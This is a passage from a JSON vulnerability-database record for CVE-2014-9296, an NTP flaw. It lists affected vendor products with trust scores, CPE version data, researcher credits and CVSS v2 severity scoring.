        "model": "oceanstor hvs88t v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor hvs85t v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor 18800f v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "18800"
      },
      {
        "model": "high-density server dh628 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "high-density server dh621 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "high-density server dh620 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "high-density server dh320 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "fusionsphere openstack v100r005c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c02spc300",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c02spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c02spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c01spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r005c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r005c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r003c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusionaccess v100r005c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusionaccess v100r005c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vtm v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vtm v100r001c30",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vtm v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vcn3000 v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace usm v200r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace uc v200r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace uc v200r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace uc v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u2980 v200r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u2980 v100r001c02spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u2980 v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace ivs v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r001c03",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c50",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c32",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c31",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c03",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cad v100r001c01lhue01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight uc\u0026c v100r001c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight uc\u0026c v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight network v200r005c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight network v200r003c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight network v200r003c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "e9000 chassis v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "e6000 chassis v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "dc v100r002c01spc001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.10"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.01"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.2"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.1"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.0"
      },
      {
        "model": "tcp/ip services for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.7"
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "hp-ux b.11.23",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "advanced server ha8000cr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "0"
      },
      {
        "model": "vipr srm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "3.6.0"
      },
      {
        "model": "m\u0026r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.5"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "netscaler gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "netscaler application delivery controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "wide area application services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex social",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server base",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "webex meetings server 2.0mr2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "virtualization experience client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "62150"
      },
      {
        "model": "virtual systems operations center for vpe project",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtual security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "videoscape conductor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "videoscape back office",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video delivery system recorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "universal small cell ran management system wireless",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unity connection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified sip proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.6"
      },
      {
        "model": "unified meetingplace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified intelligence center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications domain manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs invicta series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "transaction encryption device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence tx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "telepresence te software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-370"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-320"
      },
      {
        "model": "telepresence system series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10000"
      },
      {
        "model": "telepresence profile series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence isdn link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13100"
      },
      {
        "model": "service control engines system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "scos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "remote network control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "remote conditional access system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "quantum son suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "quantum policy suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime service catalog virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime license manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime lan management solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "powervu network center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "powervu d9190 conditional access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "powerkey encryption server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "physical access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "onepk all-in-one vm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "40000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "network configuration and change management service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "network configuration and change management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "netflow collection agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "management heartbeat server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "iptv service delivery system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ip interoperability and collaboration system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ios xr software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ios xr for cisco network convergence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "international digital network control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "intelligent automation for cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "im and presence service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "firesight system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "finesse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "explorer controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise content delivery service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "encryption appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "dncs application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital transport adapter control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital network control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "d9036 modular encoding platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "common services platform collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "common download server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "command server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "20000"
      },
      {
        "model": "cloud object store",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints sx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints mxg2 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints mx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints ex series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints c series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints 10\" touch panel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ironport encryption appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "autobackup server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "asa cx and cisco prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application networking manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application and content networking system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "one-x client enablement services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "ip office application server sp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.02"
      },
      {
        "model": "ip office application server sp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.01"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "cms r17",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "aura experience portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura experience portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "network time protocol",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.8"
      },
      {
        "model": "junos os 14.2r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1x55-d16",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1x50-d90",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3x48-d15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3r9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x47-d20",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x44-d50",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "smartcloud entry fp",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.110"
      },
      {
        "model": "vipr srm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "emc",
        "version": "3.6.1"
      },
      {
        "model": "m\u0026r 6.5u1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "emc",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "BID",
        "id": "71758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.2.7",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Stephen Roettger and Neel Mehta of the Google Security Team.",
    "sources": [
      {
        "db": "BID",
        "id": "71758"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-9296",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-9296",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-9296",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
